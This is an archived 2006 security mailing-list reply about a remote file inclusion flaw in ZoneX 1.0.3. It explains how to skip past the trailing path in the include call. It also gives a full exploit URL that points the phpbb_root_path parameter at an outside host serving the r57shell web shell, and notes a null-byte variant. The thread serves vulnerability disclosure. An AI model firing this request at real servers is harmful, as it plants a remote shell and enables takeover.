|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Re: ZoneX 1.0.3 - Publishers Gold Edition Remote File Inclusion Vulnerability
From: str0ke (str0ke
milw0rm.com)
Date: Thu Sep 07 2006 - 11:39:04 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
On 9/6/06, Steven M. Christey <coleymitre.org> wrote:
> In a typical PHP exploit scenario, the attacker could merely add a
> null byte ("%00") to the phpbb_root_path parameter, which would then
> cause the include call to ignore this extra file tree/name
> information. Is there some reason why a null byte wouldn't work in
> this situation?
You would basically just need to add ?& to the end of the http get
request as so if your including a remote file, since you would be
placing the remaining file tree as a variable name.
http://www.site.com/[path]/includes/usercp_register.php?phpbb_root_path=http://rst.void.ru/download/r57shell.txt?&
Using a null byte should work if magic_quotes = off.
Best Regards,
/str0ke
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]